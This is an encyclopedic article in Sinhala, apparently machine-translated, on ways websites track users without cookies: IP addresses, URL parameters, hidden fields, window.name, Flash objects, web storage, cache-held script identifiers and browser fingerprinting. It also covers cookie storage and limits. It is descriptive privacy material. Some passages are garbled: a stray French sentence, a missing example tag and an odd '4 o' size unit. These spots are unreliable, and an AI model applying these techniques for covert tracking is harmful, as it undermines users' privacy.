කුකීස් භාවිතයෙන් සිදු කළ හැකි සමහර මෙහෙයුම් කුකීස් මගහැර හෝ මකා දැමූ කුකීස් ප්‍රතිනිර්මාණය කරන වෙනත් යාන්ත්‍රණ භාවිතයෙන් සිදු කළ හැක, එය කුකීස් වලට වඩා පෞද්ගලිකත්වයේ ගැටළු එකම ආකාරයකින් (හෝ සමහර විට නොපෙනෙන නිසා නරක) නිර්මාණය කරයි.

IP ලිපිනය

පිටුව අමතන පරිගණකයේ IP ලිපිනය සමඟ පරිශීලකයින් නිරීක්ෂණය කළ හැක. මෙම තාක්ෂණය ලෝක ව්‍යාප්ත වෙබ් හඳුන්වාදීමේ සිට ලබා ගත හැකි විය, පිටු බාගැනීම නිසා සේවාදායකය බ්‍රවුසරය හෝ ප්‍රොක්සිය ධාවනය කරන පරිගණකයේ IP ලිපිනය ඉල්ලයි, කිසිවක් භාවිතා නොකරන්නේ නම්. කුකීස් භාවිතයේ තිබේද නැද්ද යන්න සේවාදායකයට මෙම තොරතුරු නිරීක්ෂණය කළ හැක. කෙසේ වෙතත්, පරිගණක සහ ප්‍රොක්සි භාවිතා කරන්නන් කිහිප දෙනෙකු විසින් බෙදා ගත හැකි බැවින් මෙම ලිපින සාමාන්‍යයෙන් පරිශීලකයෙකු හඳුනාගැනීමේදී කුකීස් වලට වඩා අඩු විශ්වාසදායක වේ, සහ එකම පරිගණකයට සෑම වැඩ සැසියකදීම වෙනස් IP ලිපිනයක් ලැබිය හැකිය (නිදසුනක් ලෙස දුරකථන සම්බන්ධතා සඳහා c) .

බලය ක්‍රියාත්මක වන තාක් එකම IP ලිපිනය දිගු කාලයක් පවත්වා ගෙන යන බ්‍රෝඩ්බෑන්ඩ් සම්බන්ධතා වැනි සමහර අවස්ථාවලදී IP ලිපින මගින් ලුහුබැඳීම විශ්වාසදායක විය හැක.

Tor වැනි සමහර පද්ධති නිර්මාණය කර ඇත්තේ අන්තර්ජාලයේ නිර්නාමික භාවය පවත්වා ගැනීමට සහ IP ලිපිනය මගින් ලුහුබැඳීම කළ නොහැක්කක් හෝ ප්‍රායෝගික නොවේ.

URL එක

වඩාත් නිරවද්‍ය තාක්‍ෂණයක් පදනම් වන්නේ URL වල තොරතුරු කාවැද්දීමයි. URL හි විමසුම් තන්තු කොටස සාමාන්‍යයෙන් මෙම කාර්යය සඳහා භාවිතා කරන එක් තාක්‍ෂණයකි, නමුත් අනෙකුත් කොටස් ද භාවිතා කළ හැක. Java serverlet සහ PHP සැසි යාන්ත්‍රණ දෙකම කුකීස් සක්‍රීය කර නොමැති නම් මෙම ක්‍රමය භාවිතා කරයි.

මෙම ක්‍රමයට වෙබ් සර්වරය බ්‍රවුසරයට යවන විට එය රැගෙන යන වෙබ් පිටුවේ සබැඳි වෙත නූල් ඉල්ලීම් එකතු කරයි. පරිශීලකයා සබැඳියක් අනුගමනය කරන විට, බ්‍රවුසරය අමුණා ඇති විමසුම් තන්තුව සේවාදායකය වෙත ආපසු ලබා දෙයි.

මෙම කාර්යය සඳහා භාවිතා කරන විමසුම් නූල් සහ කුකීස් ඉතා සමාන වන අතර, සේවාදායකයා විසින් අත්තනෝමතික ලෙස තෝරාගත් තොරතුරු සහ බ්‍රවුසරය විසින් ආපසු ලබා දෙන තොරතුරු වේ. කෙසේ වෙතත්, සමහර වෙනස්කම් තිබේ: විමසුම් තන්තුවක් අඩංගු URL එකක් නැවත භාවිතා කරන විට, එම තොරතුරුම සේවාදායකය වෙත යවනු ලැබේ. උදාහරණයක් ලෙස, පරිශීලකයෙකුගේ මනාපයන් URL එකක විමසුම් තන්තුවක කේතනය කර ඇත්නම් සහ පරිශීලකයා එම URL එක වෙනත් පරිශීලකයෙකුට විද්‍යුත් තැපෑලෙන් යවන්නේ නම්, එම පරිශීලකයාට ද එම මනාප භාවිතා කිරීමට හැකි වනු ඇත.

අනෙක් අතට, පරිශීලකයෙකු එකම පිටුවකට දෙවරක් ප්‍රවේශ වූ විට, එකම විමසුම් තන්තුව අවස්ථා දෙකේදීම භාවිතා වන බවට සහතිකයක් නොමැත. උදාහරණයක් ලෙස, පරිශීලකයෙකු පළමු වරට අභ්‍යන්තර අඩවි පිටුවකින් පිටුවකට ගොඩබසින අතර දෙවන වරට බාහිර පිටුවකින් එම පිටුවට ගොඩබසින්නේ නම්, අඩවි පිටුවට සාපේක්ෂව විමසුම් තන්තුව සාමාන්‍යයෙන් වෙනස් වන අතර කුකීස් සමාන වේ. .

විමසුම් තන්තු වල අනෙකුත් අවාසි ආරක්ෂාවට සම්බන්ධ වේ: විමසුම් තන්තු තුළ සැසියක් හඳුනා ගන්නා දත්ත තබා ගැනීම සැසි සවිකිරීම් ප්‍රහාර, හඳුනාගැනීමේ යොමු ප්‍රහාර සහ වෙනත් සූරාකෑම් සක්‍රීය කරයි හෝ සරල කරයි. සැසි හැඳුනුම්පත් HTTP කුකීස් ලෙස සම්මත කිරීම වඩාත් ආරක්ෂිතයි.

සැඟවුණු ආකෘති ක්ෂේත්‍රය

ASP.NET විසින් භාවිතා කරන සැසි ලුහුබැඳීමේ එක් ආකාරයක් වන්නේ සැඟවුණු ක්ෂේත්‍ර සහිත වෙබ් පෝරම භාවිතා කිරීමයි. මෙම තාක්ෂණය තොරතුරු රැගෙන යාම සඳහා URL විමසුම් තන්තු භාවිතා කිරීමට බෙහෙවින් සමාන වන අතර එකම වාසි සහ අවාසි ඇත; සහ පෝරමය HTTP GET ක්‍රමය සමඟ සකසන්නේ නම්, ක්ෂේත්‍ර ඇත්ත වශයෙන්ම පෝරමය ඉදිරිපත් කරන විට එවන බ්‍රවුසරයේ URL හි කොටසක් බවට පත්වේ. නමුත් බොහෝ පෝරම සකසනු ලබන්නේ HTTP POST සමඟින් වන අතර එමඟින් සැඟවුණු ක්ෂේත්‍ර ඇතුළුව පෝරම තොරතුරු URL හි කොටසක් හෝ කුකියක් නොවන අතිරේක ආදානයක් ලෙස එක් කිරීමට හේතු වේ.

මෙම ප්‍රවේශයට ලුහුබැඳීමේ ඉදිරිදර්ශනයකින් වාසි දෙකක් ඇත: පළමුව, URL වලට වඩා HTML මූලාශ්‍ර කේතය සහ POST ආදානය තුළ තබා ඇති තොරතුරු නිරීක්ෂණය කිරීම සාමාන්‍ය පරිශීලකයාට මෙම ලුහුබැඳීම වළක්වා ගැනීමට ඉඩ සලසයි; දෙවනුව, පරිශීලකයා URL පිටපත් කරන විට සැසි තොරතුරු පිටපත් නොකෙරේ (උදාහරණයක් ලෙස, තැටියට පිටුව සුරැකීමට හෝ ඊමේල් හරහා යැවීමට).

window.name

සියලුම පොදු වෙබ් බ්‍රව්සර් වලට DOM හි window.name ගුණාංගය භාවිතයෙන් JavaScript හරහා සෑහෙන විශාල දත්ත ප්‍රමාණයක් (2MB සිට 32MB දක්වා) ගබඩා කළ හැක. මෙම දත්ත සැසි කුකීස් වෙනුවට භාවිතා කළ හැකි අතර වසම් හරහාද භාවිතා වේ. සේවාලාභී පාර්ශ්වීය සැසි විචල්‍ය සංකීර්ණ කට්ටලයක් ගබඩා කිරීම සඳහා තාක්ෂණය JSON වස්තු සමඟ සම්බන්ධ කළ හැක.

අවාසිය නම් එක් එක් වෙනම කවුළුවක් හෝ ටැබ් එකක් මුලින් හිස් window.name තිබීමයි; ටැබ් මගින් බ්‍රවුස් කරන විට (පරිශීලකයා විසින් විවෘත කරන ලද) මෙයින් අදහස් කරන්නේ තනි තනිව විවෘත කරන ලද ටැබ් වලට කවුළු නාමයක් නොමැති බවයි. මීට අමතරව window.name පුද්ගලිකත්වය පිළිබඳ ගැටළුවක් ඇති කළ හැකි විවිධ අඩවි හරහා අමුත්තන් නිරීක්ෂණය කිරීමට භාවිතා කළ හැක.

සමහර පැතිවලින් මෙය කුකීස් වලට වඩා ආරක්ෂිත විය හැක, සේවාදායකයේ සම්බන්ධ නොවීම හේතුවෙන්, ස්නයිෆර් කුකීස් ජාල ප්‍රහාරයට එය අනාරක්ෂිත කරයි. කෙසේ වෙතත්, දත්ත ආරක්ෂා කිරීමට විශේෂ ක්‍රියාමාර්ග ගතහොත්, එම කවුළුවේම විවෘත කර ඇති වෙනත් වෙබ් අඩවි හරහා දත්ත ලබා ගත හැකි බැවින්, එය තවදුරටත් ප්‍රහාරවලට ගොදුරු වේ.

HTTP සත්‍යාපනය

HTTP ප්‍රොටෝකෝලයට මූලික ප්‍රවේශ සත්‍යාපන ප්‍රොටෝකෝල සහ ප්‍රවේශ සත්‍යාපන ඩයිජස්ට් ඇතුළත් වේ, එය පරිශීලකයා පරිශීලක නාමය සහ මුරපදය ලබා දී ඇති විට පමණක් වෙබ් පිටුවකට ප්‍රවේශ වීමට ඉඩ සලසයි. සේවාදායකය විසින් වෙබ් පිටුවකට ප්‍රවේශය ලබා දීමට සහතිකයක් ඉල්ලා සිටින්නේ නම්, බ්‍රවුසරය එය පරිශීලකයාගෙන් ඉල්ලා සිටින අතර එය ලබාගත් පසු, බ්‍රවුසරය එය ගබඩා කර ඊළඟ සියලුම HTTP ඉල්ලීම් තුළ යවයි. පරිශීලකයා නිරීක්ෂණය කිරීමට මෙම තොරතුරු භාවිතා කළ හැක.

දේශීය බෙදාගත් වස්තුව

බ්‍රවුසරයක Adobe Flash Player ප්ලගිනය ඇතුළත් නම්, දේශීය හවුල් වස්තූන් කුකීස් ලෙස එකම අරමුණ සඳහා භාවිතා කළ හැක. ඒවා වෙබ් සංවර්ධකයින් සඳහා ආකර්ශනීය තේරීමක් විය හැකිය:

• දේශීය හවුල් වස්තුවක් සඳහා පෙරනිමි ප්‍රමාණයේ සීමාව 100 KB වේ;
• ආරක්ෂක චෙක්පත් පරිශීලක කුකී චෙක්පත් වලින් වෙන්ව ඇත (එබැවින් කුකීස් නොමැති විට දේශීය බෙදාගත් වස්තු වලට ඉඩ දිය හැක).

මෙම අවසාන කරුණ, කුකී කළමනාකරණ ප්‍රතිපත්තිය Adobe හි දේශීය හවුල් වස්තු වලින් වෙන්කර හඳුනා ගනී ප්‍රශ්න මතු කරයි ඔහුගේ රහස්‍යතා සැකසීම් භාවිතා කරන්නා විසින් කළමනාකාරිත්වය සම්බන්ධයෙන්: ඔහුගේ කුකීස් කළමනාකරණය දේශීය හවුල් වස්තූන් කළමනාකරණයට කිසිදු බලපෑමක් නොකරන බව ඔහු දැන සිටිය යුතුය, සහ අනෙක් අතට.

මෙම පද්ධතිය පිළිබඳ තවත් විවේචනයක් නම්, එය භාවිතා කළ හැක්කේ Adobe Flash Player ප්ලගිනය හරහා පමණක් වන අතර එය හිමිකාර සහ වෙබ් සම්මතයක් නොවේ.

සේවාලාභී පාර්ශ්වයේ අඛණ්ඩ පැවැත්ම

සමහර වෙබ් බ්‍රව්සර් ස්ක්‍රිප්ට් මත පදනම් වූ නොනැසී පවතින යාන්ත්‍රණයකට සහය දක්වයි, එමඟින් පිටුවට පසුකාලීන භාවිතය සඳහා දේශීයව තොරතුරු ගබඩා කිරීමට ඉඩ සලසයි. උදාහරණයක් ලෙස, Internet Explorer, බ්‍රවුසර ඉතිහාසය, පිටු සලකුණු, XML හි ගබඩා කර ඇති ආකෘතියකින් හෝ සෘජුවම තැටියට සුරකින ලද වෙබ් පිටුවක් සමඟ ස්ථිර තොරතුරු සඳහා සහය දක්වයි. Microsoft Internet Explorer 5 සඳහා, DHTML හැසිරීම් හරහා ලබා ගත හැකි පරිශීලක දත්ත ක්‍රමයක් තිබේ.

W3C විසින් HTML 5 හි නව ජාවාස්ක්‍රිප්ට් API එකක් හඳුන්වා දුන් අතර එය සේවාලාභී පාර්ශ්වික දත්ත ගබඩා කිරීම සඳහා වෙබ් ආචයනය ලෙස හැඳින්වෙන අතර කුකීස් ස්ථිරවම ප්‍රතිස්ථාපනය කිරීම අරමුණු කර ඇත. එය කුකීස් වලට සමාන නමුත් විශාල ලෙස වැඩිදියුණු කළ ධාරිතාවකින් සහ HTTP ඉල්ලීම්වල ශීර්ෂයේ තොරතුරු ගබඩා නොකර ඇත. API වෙබ් ආචයනය වර්ග දෙකකට ඉඩ දෙයි: දේශීය ගබඩාව සහ සැසි ගබඩාව, ස්ථීර කුකීස් සහ සැසි කුකීස් වලට සමානයි (බ්‍රවුසරය වසා ඇති විට සැසි කුකීස් කල් ඉකුත් වීම හැර. සැසි ගබඩාව පිළිවෙලින් ටැබ් එක වසා ඇති විට කල් ඉකුත් වේ. වෙබ් ආචයනය Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 සහ Opera 10.50 මගින් සහය දක්වයි.

වෙනස් යාන්ත්‍රණයක් සාමාන්‍යයෙන් වෙබ් පිටු වල ජාවාස්ක්‍රිප්ට් ක්‍රමලේඛ භාවිතා කරමින් බ්‍රවුසර හැඹිලි (නැවුම් කිරීමට වඩා මතකයේ) මත රඳා පවතී. 

උදාහරණයක් ලෙස, පිටුවක ටැගය අඩංගු විය හැක . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

මෙම අවස්ථාවෙහිදී, වැඩසටහන හැඹිලි මතකයේ පවතින අතර දෙවන වරට පැමිණි පිටුව නැවත පූරණය නොවේ. එහි ප්‍රතිඵලයක් ලෙස, වැඩසටහනේ ගෝලීය විචල්‍යයක් තිබේ නම් (උදාහරණයක් ලෙස var id = 3243242;), මෙම හඳුනාගැනීම වලංගු වන අතර පිටුව නැවත පූරණය වූ පසු හෝ වැඩසටහන සම්බන්ධ කරන පිටුවක් පූරණය වූ පසු වෙනත් JavaScript කේතය මඟින් එය ප්‍රයෝජනයට ගත හැක. 

මෙම ක්‍රමයේ ඇති ප්‍රධාන අවාසිය නම් JavaScript ගෝලීය විචල්‍යය ස්ථිතික විය යුතුය, එනම් එය කුකියක් මෙන් වෙනස් කිරීමට හෝ මකා දැමීමට නොහැකි වීමයි.

වෙබ් බ්‍රවුසරයේ ඇඟිලි සලකුණ

බ්‍රවුසරයේ ඇඟිලි සලකුණක් යනු හඳුනාගැනීමේ අරමුණු සඳහා බ්‍රවුසරයක වින්‍යාස සැකසුම් පිළිබඳ එකතු කරන ලද තොරතුරු වේ. කුකීස් අක්‍රිය වූ විට පවා අන්තර්ජාල පරිශීලකයෙකු හෝ උපාංගයක් සම්පූර්ණයෙන් හෝ අර්ධ වශයෙන් හඳුනා ගැනීමට මෙම ඇඟිලි සලකුණු භාවිත කළ හැක.

මානව වෙබ් ගමනාගමනය නිවැරදිව මැනීම සහ විවිධ ආකාරයේ ක්ලික් වංචා හඳුනාගැනීම සඳහා මූලික වෙබ් බ්‍රවුසර වින්‍යාස තොරතුරු දිගු කලක් තිස්සේ වෙබ් අඩවි ප්‍රේක්ෂක සේවා විසින් රැස් කර ඇත. සේවාලාභී පාර්ශ්වයේ ස්ක්‍රිප්ටින් භාෂා ආධාරයෙන්, වඩාත් නිවැරදි තොරතුරු රැස් කිරීම වේ දැන් හැකි.

මෙම තොරතුරු බිට් තන්තුවකට පරිවර්තනය කිරීම උපාංග ඇඟිලි සලකුණක් නිපදවයි. 2010 දී, ඉලෙක්ට්‍රොනික් ෆ්‍රොන්ටියර් පදනම (EFF) බ්‍රවුසරයේ ඇඟිලි සලකුණක එන්ට්‍රොපිය අවම වශයෙන් මැනිය. 18,1 බිටු, සහ කැන්වස් ඇඟිලි සලකුණු වල දියුණුවට පෙර එම එන්ට්‍රොපියට බිටු 5,7ක් එකතු විය.

කෙටියෙන් කුකීස්

කුකීස් යනු වෙබ් බ්‍රවුසරය විසින් වෙබ් අඩවි නරඹන්නන්ගේ දෘඪ තැටියේ ගබඩා කර ඇති කුඩා පෙළ ගොනු වන අතර ඒවා නරඹන්නන් හෝ වෙබ් අඩවිය හරහා ඔවුන්ගේ ගමන පිළිබඳ තොරතුරු වාර්තා කිරීමට (වෙනත් දේ අතර) භාවිතා කරයි. වෙබ්මාස්ටර්ට මෙලෙස අමුත්තන්ගේ පුරුදු හඳුනා ගත හැකි අතර එක් එක් අමුත්තන් සඳහා ඔහුගේ වෙබ් අඩවිය ඉදිරිපත් කිරීම පුද්ගලීකරණය කළ හැකිය; කුකීස් මඟින් මුල් පිටුවේ කොපමණ ලිපි ප්‍රදර්ශනය කළ යුතුද යන්න මතක තබා ගැනීමට හෝ ඕනෑම පුද්ගලික පාර්ශවයක් සඳහා පිවිසුම් අක්තපත්‍ර තබා ගැනීමට පවා හැකි වේ: අමුත්තා නැවත වෙබ් අඩවියට පැමිණි විට, ඔහුට ඔහුගේ නම සහ මුරපදය ටයිප් කිරීම තවදුරටත් අවශ්‍ය නොවේ. ඒවා කුකියේ ස්වයංක්‍රීයව කියවන බැවින් හඳුනාගන්න.

කුකියකට සීමිත ආයු කාලයක් ඇත, එය අඩවි නිර්මාණකරු විසින් සකසා ඇත. වෙබ් අඩවියේ සැසිය අවසානයේ ඒවා කල් ඉකුත් විය හැකි අතර එය බ්‍රවුසරය වැසීමට අනුරූප වේ. අමුත්තන්ට ජීවිතය පහසු කිරීමට සහ වඩාත් අදාළ තොරතුරු ඉදිරිපත් කිරීමට කුකීස් බහුලව භාවිතා වේ. නමුත් විශේෂ ශිල්පීය ක්‍රම මඟින් වෙබ් අඩවි කිහිපයක අමුත්තන් අනුගමනය කිරීමටත්, ඔහුගේ පුරුදු පිළිබඳ ඉතා පුළුල් තොරතුරු රැස් කර හරස් පරීක්‍ෂා කිරීමටත් හැකි වේ. මෙම ක්‍රමය කුකීස් භාවිතය අමුත්තන්ගේ පෞද්ගලිකත්වය උල්ලංඝනය කරන නිරීක්ෂණ ක්‍රමයක් ලෙස කීර්තියක් ලබා දී ඇත, එය අවාසනාවන්ත ලෙස තාක්ෂණික නොවන හේතූන් මත හෝ පරිශීලක අපේක්ෂාවන්ට ගරු නොකරන බොහෝ අවස්ථාවල යථාර්ථයට අනුරූප වේ.

මෙම නීත්‍යානුකූල බියට ප්‍රතිචාර වශයෙන්, HTML 5 විසින් සේවාලාභී පාර්ශ්වික දත්ත ගබඩා කිරීම සඳහා නව JavaScript API හඳුන්වා දෙයි, එය වඩාත් ආරක්ෂිත සහ වැඩි ධාරිතාවයකින් යුත්, කුකීස් ප්‍රතිස්ථාපනය කිරීම අරමුණු කර ගෙන ඇත.

කුකීස් ගබඩා කිරීම

සමහර බ්‍රව්සර් සමඟ, කුකියක් පහසුවෙන් සංස්කරණය කළ හැකිය, එහි අගයන් අතින් වෙනස් කිරීමට Notepad වැනි සරල පෙළ සංස්කාරකයක් ප්‍රමාණවත් වේ.

බ්‍රවුසරය අනුව කුකීස් වෙනස් ලෙස සුරැකේ:

• Microsoft Internet Explorer එක් එක් කුකිය වෙනස් ගොනුවක සුරකියි;
• මොසිලා ෆයර්ෆොක්ස් එහි සියලුම කුකීස් එක ගොනුවක සුරකියි;
• ඔපෙරා එහි සියලුම කුකීස් තනි ගොනුවක් තුළ සුරකින අතර ඒවා සංකේතනය කරයි (මෘදුකාංග විකල්පයන් හැර ඒවා වෙනස් කිරීම කළ නොහැක);
• ඇපල් සෆාරි එහි සියලුම කුකීස් තනි .plist දිගු ගොනුවක් තුළ සුරකියි. ඔබ මෘදුකාංග විකල්ප හරහා යන්නේ නම් මිස වෙනස් කිරීම කළ හැකි නමුත් ඉතා පහසු නොවේ.

සහාය දැක්වීමට බ්‍රව්සර් අවශ්‍ය වේ අවම :

• 300 එකවර කුකීස්;
• කුකියකට 4 o;
• සත්කාරක හෝ වසමකට කුකීස් 20ක්.